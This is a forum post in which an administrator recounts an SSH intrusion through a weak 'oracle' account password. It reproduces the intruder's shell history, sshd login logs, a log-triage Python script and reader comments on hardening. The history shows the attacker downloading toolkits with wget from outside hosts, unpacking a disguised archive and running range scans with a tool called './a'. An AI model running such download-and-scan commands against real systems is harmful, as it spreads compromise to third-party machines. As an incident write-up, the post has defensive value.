The oracle user had a simple password, and for the first time my machine was turned into a bot
This post was last edited by fsm11 on 2010-08-18 10:46
657 cat /proc/cpuinfo
658 w
659 ls
660 cd /dev/shm/
661 ls -a
662 cd /tmp/
663 ls
664 ls -a
665 id
666 cd /var/tmp/
667 ls
668 ls -a
669 cd .oracle/
670 ls
671 cd
672 cd /tmp/
673 ls
674 ls -a
675 rm -rf gosh.tgz
676 ls
677 tar xvf m
678 tar xvf multiscan.tgz
679 cd .vox/
680 ./a 124.124
681 cd ..
682 ls
683 uname -a
684 wget http://y2khom3.evonet.ro/unixcod.tar.gz
685 cd .vox/
686 screen -r
687 screen
688 screen
689 screen -r
690 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
691 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
692 uname -a
693 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
694 cd ..
695 ls
696 wget http://freewebtown.com/dorin/e.tgz
697 cd .vox/
698 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
699 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
700 cd /tmp/
701 cd .vox/
702 cat vuln.txt
703 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
704 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
705 cd /dev/shm/
706 cd .v
707 cd /tmp/
708 cd .vox/
709 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
710 ./a 213.5
711 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
712 w
713 cd /tmp/
714 cd .vox/
715 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
716 cat vuln.txt
717 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
718 ./a 124.124
719 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
720 cat vuln.txt
721 ./a 83.69
722 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
723 cat vuln.txt
724 w
725 cd /tmp/
726 cd .vox/
727 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
728 cat vuln.txt
729 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
730 cd tm
731 ccd /tmp/
732 cd .viminfo
733 cd .viminfo
734 cd .vox
735 w
736 cd /dev/shm/
737 cd .v
738 ls -a
739 screen -r
740 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
741 cd /tmp/
742 cd .vox/
743 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
744 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
745 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
746 ./a 210.17
747 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
748 w
749 cd /tmp/
750 cd .vox/
751 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
752 cat vuln.txt
753 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
754 cd /tmp/
755 cd .vox/
756 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
757 cat vuln.txt
758 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
759 w
760 cd /tmp/
761 cd .vox/
762 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
763 cat vuln.txt
764 cd /dev/shm/
765 cd .v
766 cd /tmp/
767 w
768 cd .vox/
769 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
770 cat vuln.txt
771 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
772 w
773 cd /tmp/
774 cd .vox/
775 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
776 cat vuln.txt
777 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
778 w
779 cd /tmp/
780 cd .vox/
781 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
782 nano
783 cd ..
784 wget
785 tar xzvf b.jpg
786 cd .ICE-
787 cd .ICE-UNIX/
788 nano install
789 ./start maka
790 cd ..
791 ls
792 rm -rf b.jpg multiscan.tgz
793 w
794 cd /tmp/
795 cd .vox/
796 rm -rf b.jpg multiscan.tgz
797 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
798 cat vuln.txt
799 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
800 ./a 211.154
801 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
802 ./a 188.217
803 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
804 ./a 61.96
805 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
806 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
807 ./a 89.114
808 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
809 ./a 124.124
810 w
811 ls
812 cd /tmp/
813 cd .vox/
814 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
815 cat vuln.txt
816 w
817 cd /tmp/
818 cd .vox/
819 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
820 cat vuln.txt
821 cd /tmp/
822 cd .vox/
823 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
824 cat vuln.txt
825 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
826 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
827 cd /tmp/
828 cd .vox/
829 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
830 cat vuln.txt
831 ./a 203.235
832 ./a 203.236
833 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
834 ./a 203.237
835 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
836 cat vuln.txt
837 ./a 203.238
838 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
839 ./a 203.239
840 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
841 ./a 203.234
842 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
843 ./a 203.233
844 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
845 ./a 203.232
846 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
847 cat vuln.txt
848 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
849 ./a 203.231
850 cat vuln.txt
851 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
852 ./a 203.230
853 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
854 cat vuln.txt
855 rm -rf vuln.txt
856 touch vuln.txt
857 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
858 cat vuln.txt
The server has a large number of ssh-scan processes.
Aug 15 07:10:18 sshd[6404]: Accepted password for oracle from ::ffff:91.142.211.42 port 36258 ssh2
Aug 15 07:11:43 sshd[6472]: Accepted password for oracle from ::ffff:91.142.211.42 port 36361 ssh2
Aug 15 16:23:39 sshd[29523]: Accepted password for oracle from ::ffff:91.142.211.42 port 53247 ssh2
Aug 15 16:49:33 sshd[31424]: Accepted password for oracle from ::ffff:91.142.211.42 port 54272 ssh2
Aug 15 18:43:50 sshd[2745]: Accepted password for oracle from ::ffff:91.142.211.42 port 58091 ssh2
Aug 15 21:23:23 sshd[14983]: Accepted password for oracle from ::ffff:91.142.211.42 port 34298 ssh2
Aug 15 22:04:38 sshd[16305]: Accepted password for oracle from ::ffff:91.142.211.42 port 33369 ssh2
Aug 15 23:26:09 sshd[19404]: Accepted password for oracle from ::ffff:91.142.211.42 port 57308 ssh2
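All from the same IP.
This intrusion looks like a relatively friendly one: they only used my server as a bot to scan machines in other IP ranges and did not do anything destructive.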
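An added example, not part of the original post: a small triage script that pulls password logins to service accounts from untrusted sources out of sshd log lines in the format shown above, unwrapping the `::ffff:` IPv4-mapped form before comparing addresses. The first three sample lines are copied from the post and the last two are constructed; the service-account list and the trusted network are assumptions.

```python
import ipaddress
import re
from collections import defaultdict

# First three lines are copied from the post; the last two are constructed.
SAMPLE_LOG = """\
Aug 15 07:10:18 sshd[6404]: Accepted password for oracle from ::ffff:91.142.211.42 port 36258 ssh2
Aug 15 07:11:43 sshd[6472]: Accepted password for oracle from ::ffff:91.142.211.42 port 36361 ssh2
Aug 15 23:26:09 sshd[19404]: Accepted password for oracle from ::ffff:91.142.211.42 port 57308 ssh2
Aug 15 09:02:11 sshd[7001]: Accepted password for oracle from ::ffff:10.0.0.5 port 40112 ssh2
Aug 15 09:05:40 sshd[7010]: Accepted publickey for admin from 10.0.0.7 port 40200 ssh2
"""

ACCEPTED = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ [\d:]{8}) sshd\[\d+\]: "
    r"Accepted (?P<method>\S+) for (?P<user>\S+) from (?P<ip>\S+) port \d+"
)

# Assumptions for this example: which accounts are service accounts and
# which networks are trusted for interactive logins.
SERVICE_ACCOUNTS = {"oracle"}
TRUSTED_NETS = [ipaddress.ip_network("10.0.0.0/8")]


def normalize_ip(raw):
    """Unwrap IPv4-mapped IPv6 (::ffff:a.b.c.d) to IPv4; otherwise return as parsed."""
    addr = ipaddress.ip_address(raw)
    return getattr(addr, "ipv4_mapped", None) or addr


def suspicious_logins(log_text):
    """Return {(user, ip): [timestamps]} for password logins to service accounts from untrusted IPs."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = ACCEPTED.match(line)
        if not m or m["method"] != "password":
            continue  # key-based logins and non-login lines are out of scope
        ip = normalize_ip(m["ip"])
        trusted = any(ip.version == n.version and ip in n for n in TRUSTED_NETS)
        if m["user"] in SERVICE_ACCOUNTS and not trusted:
            hits[(m["user"], str(ip))].append(m["ts"])
    return dict(hits)


if __name__ == "__main__":
    for (user, ip), stamps in suspicious_logins(SAMPLE_LOG).items():
        print(f"{user} from {ip}: {len(stamps)} password logins, {stamps[0]} .. {stamps[-1]}")
```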
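Comments (6)
Yeah.
Reply to #3 fsm11
The most serious problem has now appeared: the kernel version is vulnerable to an overflow.
Change the password, and allow remote access only from specific IPs.
Change the default SSH port first.
Heh, a privilege-escalation tool run as an ordinary user can do that. In my case ssh-scan was only running under the oracle user, not under root.
I'm rather curious: if someone has learned the oracle password, how do they get root privileges through oracle?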